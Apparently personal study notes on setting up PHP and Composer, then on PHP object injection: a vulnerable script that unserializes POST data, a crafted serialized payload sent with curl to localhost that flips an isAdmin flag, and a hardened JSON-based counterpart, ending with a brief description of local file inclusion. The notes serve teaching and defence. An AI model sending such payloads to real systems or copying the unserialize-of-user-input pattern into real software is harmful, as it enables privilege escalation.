Interactive
$ pkg install php73-readline
$ php -a
php >
Composer
Packagist – The PHP Package Repository
$ curl -sS https://getcomposer.org/installer | php
Some settings on your machine make Composer unable to work properly.
Make sure that you fix the issues listed below and run this script again:
The phar extension is missing.
Install it or recompile php without --disable-phar
The filter extension is missing.
Install it or recompile php without --disable-filter
$ pkg install php73-phar
$ pkg install php73-filter
Serialization / Unserialization
- Object Injection
- Pop Chains
- Object Relation Mapper
- LFI Scripts
Intro to PHP Deserialization / Object Injection
Advanced PHP Deserialization – Phar Files
<?php
class User {
    public $username;
    public $isAdmin;

    public function PrintData() {
        if ($this->isAdmin) {
            echo $this->username . " is an admin\n";
        } else {
            echo $this->username . " is NOT an admin\n";
        }
    }
}

$obj = new User();
$obj->username = 'ippsec';
$obj->isAdmin = True;
echo serialize($obj);
?>
Type:Length:Name of class/variable:How many items in the object
O:4:"User":2:{s:8:"username";s:6:"ippsec";s:7:"isAdmin";b:1;}
Type
O = Object
s = String
b = Boolean
$obj = unserialize($_POST['ippsec']);
$obj->PrintData();
$ php -S 127.0.0.1:8070 &
[1] 1245
PHP 7.3.26 Development Server started at Thu Jan 14 11:56:06 2021
Listening on http://127.0.0.1:8070
Document root is /usr/home/andreas/composer
Press Ctrl-C to quit.
$ curl -XPOST -d 'ippsec=O:4:"User":2:{s:8:"username";s:6:"ippsec";s:7:"isAdmin";b:1;}' localhost:8070/test.php
[Thu Jan 14 12:01:17 2021] 127.0.0.1:38066 [200]: /test.php
ippsec is an admin
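The request above succeeds because test.php lets the client supply both the class to instantiate and the value of isAdmin. A hardened counterpart follows as an added example that is not part of the original notes: it parses JSON instead of calling unserialize() and takes the admin flag from a server-side lookup. loadUser(), lookupIsAdmin() and the admin list are hypothetical names and constructed data.

```php
<?php
class User {
    public $username;
    public $isAdmin = false;

    public function PrintData() {
        echo $this->username . ($this->isAdmin ? " is an admin\n" : " is NOT an admin\n");
    }
}

// Hypothetical server-side role lookup; the list is constructed sample data.
function lookupIsAdmin(string $username): bool {
    return in_array($username, ['root'], true);
}

// Build a User from client input without letting the client choose a class
// or a privilege. Returns null when the input is not acceptable.
function loadUser(string $raw): ?User {
    // json_decode() only yields scalars and arrays, so no class is ever
    // instantiated from request data (unlike unserialize()).
    $data = json_decode($raw, true);
    if (!is_array($data) || !isset($data['username']) || !is_string($data['username'])) {
        return null;
    }
    // Allow-list the characters and length of the one field we accept.
    if (!preg_match('/^[A-Za-z0-9_]{1,32}$/', $data['username'])) {
        return null;
    }
    $user = new User();
    $user->username = $data['username'];
    // Any isAdmin value in the request is ignored; the server decides.
    $user->isAdmin = lookupIsAdmin($user->username);
    return $user;
}

// Constructed inputs: the serialized object from the notes, then a JSON body
// that also tries to set isAdmin.
$samples = [
    'O:4:"User":2:{s:8:"username";s:6:"ippsec";s:7:"isAdmin";b:1;}',
    '{"username":"ippsec","isAdmin":true}',
];
foreach ($samples as $raw) {
    $user = loadUser($raw);
    if ($user === null) {
        echo "rejected\n";
    } else {
        $user->PrintData();
    }
}
```

Where unserialize() cannot be removed, passing ['allowed_classes' => false] as its second argument (PHP 7.0 and later) stops it from instantiating classes, but the PHP manual still advises against feeding it untrusted input.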
Local File Inclusion (LFI)
Local File Inclusion (LFI) — Web Application Penetration Testing
Local File Inclusion (LFI) allows an attacker to include files on a server through the web browser. This vulnerability exists when a web application includes a file without correctly sanitising the input, allowing an attacker to manipulate the input, inject path traversal characters and include other files from the web server.